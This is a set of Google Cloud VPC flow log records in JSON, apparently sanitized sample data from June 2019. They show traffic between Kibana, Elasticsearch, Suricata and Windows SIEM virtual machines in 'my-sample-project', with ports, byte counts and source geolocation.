-{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"203.0.113.58","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.101","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"203.0.113.134","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.0.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"203.0.113.134","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 